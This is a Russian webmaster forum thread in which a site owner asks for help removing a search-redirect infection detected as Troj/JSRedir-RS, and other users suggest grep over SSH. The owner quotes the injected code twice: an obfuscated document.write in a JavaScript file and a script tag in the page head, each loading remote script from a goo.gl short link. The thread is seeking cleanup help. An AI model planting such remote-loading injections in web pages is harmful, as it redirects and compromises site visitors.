Troj/JSRedir-RS

12 3
Ungol
На сайте с 18.06.2010
Offline
102
3676

Приветствую.

Какое-то время назад у меня появился ПОИСКОВЫЙ редирект. Поиск в жопе, народ шугается - все дела.

Сайт скачал, айболитом проверил - нашел много говна Почистил. Не помогло.

И вот пару дней назад Яндекс обнаружил у меня Troj/JSRedir-RS и совсем заблокировал. Ну хоть стало понятно что искать((( Но в сети про это говно ничего нет.

Еще раз скачал сайт, проверил АВАСТом - нашел еще несколько троянов - почистил. Но этот - нет.

Установил Софос и БИНГО! Нашел! Сидел в board/public/js/ips.js

выглядит так

document.write('<script type="text/ja'+'vasc'+'ript" src="http://goo.gl/КОД">'+'</'+'script>');

Файл заменил на чистый из архива. Но редирект, сука, остался!

Я нуб в вирусоборстве, народ помогите! Как эту хрень купировать? Я уже на стенку лезу...

L
На сайте с 19.04.2008
Offline
105
#1

Собираю способы проверять сайты на вирусы - напишите плз, что именно из Софоса использовали? - Обычный ПК-антивир?

Ungol
На сайте с 18.06.2010
Offline
102
#2
Lidiya:
Собираю способы проверять сайты на вирусы - напишите плз, что именно из Софоса использовали? - Обычный ПК-антивир?

Да, скачал бесплатную версию с офсайта

---------- Добавлено 15.05.2016 в 14:45 ----------

Добрые люди подсказали что у меня в head 🤪

<script src="http://goo.gl/houL6e" type="text/javascript">

Как его теперь локализовать?

Подскажите плиз... firebagom я его вижу, но ГДЕ эта тварь непонятно вообще.

M2
На сайте с 11.01.2011
Offline
342
#3

Нужно и его локализовывать, и ту дырку, через которую его смогли залить.

------------------- Крутые VPS и дедики. Качество по разумной цене ( http://cp.inferno.name/view.php?product=1212&gid=1 ) VPS25OFF - скидка 25% на первый платеж по ссылке выше
Ungol
На сайте с 18.06.2010
Offline
102
#4
mark2011:
Нужно и его локализовывать, и ту дырку, через которую его смогли залить.

Это понятно.

А прямо сейчас нужно удалить КОНКРЕТНУЮ гребанную вставку которая прямо сейчас редиректит с сайта.

Вот прямо ЭТУ и СЕЙЧАС. КАК? Вот в чем вопрос.

M2
На сайте с 11.01.2011
Offline
342
#5

Есть доступ к SSH?

Ungol
На сайте с 18.06.2010
Offline
102
#6
mark2011:
Есть доступ к SSH?

если я правильно понял вопрос да. Есть доступ к файлам сайта по фтп (захожу через WinSCP)

M2
На сайте с 11.01.2011
Offline
342
#7

grep -r "слово" /путь/к/файлам/сайта/

Если выполнить эту команду в консоли сервера, она покажет вам все файлы, в которых встречается данное слово или выражение.

Ungol
На сайте с 18.06.2010
Offline
102
#8
mark2011:
Если выполнить эту команду в консоли сервера, она покажет вам все файлы, в которых встречается данное слово или выражение.

Спасибо, добрый человек. Но моя WinSCP в консоли такую команду не принимает((( Или невезуха или рукожопство((

Посоветуйте прогу для нормальной работы с консолью, плиз.

M2
На сайте с 11.01.2011
Offline
342
#9

У вас сайт на шареде или впс? Если шаред, вы эту команду не выполните.

Ungol
На сайте с 18.06.2010
Offline
102
#10
mark2011:
У вас сайт на шареде или впс? Если шаред, вы эту команду не выполните.

сервер выделенный, да

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий